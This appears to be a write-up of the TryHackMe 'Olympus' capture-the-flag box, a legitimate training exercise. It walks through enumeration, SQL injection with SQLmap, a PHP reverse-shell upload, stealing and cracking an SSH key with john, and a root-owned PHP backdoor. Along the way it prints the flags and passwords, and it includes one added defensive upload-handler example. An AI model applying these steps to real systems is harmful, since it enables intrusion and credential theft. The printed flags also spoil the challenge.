CREATE & DESTROY

Olympus | TryHackMe

nmap -sC -sV -T4 $IP -oN initial.nmap    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 19:28 BST
Nmap scan report for
Host is up (0.056s latency).
Not shown: 998 closed tcp ports (conn-refused)
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0a:78:14:04:2c:df:25:fb:4e:a2:14:34:80:0b:85:39 (RSA)
|   256 8d:56:01:ca:55:de:e1:7c:64:04:ce:e6:f1:a5:c7:ac (ECDSA)
|_  256 1f:c1:be:3f:9c:e7:8e:24:33:34:a6:44:af:68:4c:3c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://olympus.thm
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial nmap scan gives us two ports open so it’ll be a deep dive into the web app…

Adding olympus.thm to /etc/hosts gives us this landing page. Time to run some more enumeration.

Gobuster gives some results, including ~webmaster and phpmyadmin. The phpmyadmin result appears to be a red herring.

The webmaster URL contains posts suggesting members are using weak passwords that may well be brute-forceable, should we be able to harvest some useful creds.

Running some basic LFI tests on the page comes up dry but there’s a login form that appears vulnerable to SQLi so I get SQLmap to work dumping the database (because I suck at SQLi). A little tip for easy SQLmap syntax is to submit a POST request to the form and grab the request in Firefox’s Network tab and copy as cURL.

[19:52:06] [INFO] fetching tables for database: 'olympus'
[19:52:06] [INFO] fetching number of tables for database 'olympus'
[19:52:06] [INFO] retrieved: 6
[19:52:31] [INFO] retrieved: categories
[19:56:15] [INFO] retrieved: chats
[19:58:02] [INFO] retrieved: comments
[20:01:21] [INFO] retrieved: flag
[20:03:00] [INFO] retrieved: posts
[20:05:46] [INFO] retrieved: users

Unsurprisingly, the first flag can be found inside the flag table.

| flag                      |
| flag{Sm4rt!_k33P_d1gGIng} |

From the users table a set of credentials for user prometheus can be retrieved, with a hashed password. There’s a column named “randsalt” so I’d assumed the hash would be salted, but the fields were empty. We get the bcrypt hash and crack it for the user’s password.


Unfortunately this doesn’t let us log in on the SSH server, only into the CMS, and after a lot of hunting I conclude there are no exploits available. It seems there is another subdomain revealed during enumeration which takes us to a chat app, with upload functionality and an apparent /uploads/ folder. The chat log mentions the app changing file names, but it doesn’t seem to care what extension a file is given. Uploading a PHP reverse shell seems perfectly acceptable, and after checking the files column of the chat table we can pop a shell as www-data on the box.
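The foothold above works because the chat app renames uploads but trusts the client-supplied extension. As an added example (not the Olympus app’s own code), this is what a PHP upload handler looks like when it renames the file, derives the extension from the detected MIME type instead of the filename, and writes it somewhere Apache does not serve; the upload directory and the form field name are assumptions.

```php
<?php
// Added example, not the chat app's code. Assumed: UPLOAD_DIR is outside the
// web root and not served by Apache; the form field is named "file".
declare(strict_types=1);

const UPLOAD_DIR = '/var/www/uploads_private';
// Allow-list keyed on detected MIME type; the stored extension comes from here,
// never from $_FILES['file']['name'], so "shell.php" can't land as .php.
const ALLOWED = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
    'text/plain' => 'txt',
];

function store_upload(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // Sniff the content rather than trusting the client-sent type or name.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException("type not allowed: $mime");
    }
    // Random name (as the original app did) plus an allow-listed extension.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not move file');
    }
    chmod($dest, 0640); // no execute bit, whatever the content turns out to be
    return $name;
}

if (isset($_FILES['file'])) {
    try {
        echo 'stored as ' . htmlspecialchars(store_upload($_FILES['file']));
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage());
    }
}
```

Files stored this way are then handed back through a download script that sets Content-Disposition, so nothing under /uploads/ is ever executed by the web server.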

Inside /home/zeus/ the second flag can be found, and now it’s time to enumerate and find a way to escalate.

It appears that www-data can run the SUID binary CPUtils, which copies files as the user zeus. Using this means it’s possible to copy zeus’s id_rsa from the .ssh folder and drop it into a readable file inside /tmp/.

Before logging in, the SSH key needs cracking so we can obtain the passphrase.

└─$ ssh2john id_rsa > id_rsa.hash

└─$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8                                 
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
snowflake        (id_rsa)     
1g 0:00:00:29 DONE (2022-08-21 14:59) 0.03334g/s 51.21p/s 51.21c/s 51.21C/s 234567..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
zeus@olympus:~$ id                                                   
uid=1000(zeus) gid=1000(zeus) groups=1000(zeus),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev)

There’s no obvious misconfiguration for zeus, but after some rooting around a folder named 0aB44fdS3eDnLkpsz3deGv8TttR4sc can be found in /var/www/html. When navigating directly to the URL it presents a login form, whose password can be found inside VIGQFQFMYOST.php.

$pass = "a7c5ffcf139742f52a5267c4a0674129";
if(!isset($_POST["password"]) || $_POST["password"] != $pass) die('<form name="auth" method="POST">Password: <input type="password" name="password" /></form>');

The form gives the syntax and it’s effectively a PHP reverse shell, like our initial foothold. Except this file is owned by root, not www-data, so it pops a shell as root!

Heading to /root/root.flag we get flag 3 and a hint that there’s a secret to be found. Generating some SSH keys will make this a bit less painful.

root@olympus:/etc# grep -irl flag{

Some quick digging and the bonus flag is found.

This was a fun box. Blind SQLi takes time, so it made the box feel longer than it was, but the path to root was fun.
